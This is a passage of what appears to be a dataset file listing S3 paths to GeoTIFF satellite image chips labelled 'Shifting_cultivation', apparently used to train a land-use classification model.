's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_600.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1400_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3300.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1500_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2000.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_3900.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1600_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3100.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1700_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_1900.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3800.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1800_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2700.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_1900_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_1900.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3700.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2000_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_200_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_200_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_200_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_3200.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2100_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2200_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_2200_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_300_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_600.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_400_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_500_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_1300.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_600_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_500.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1400.tif', 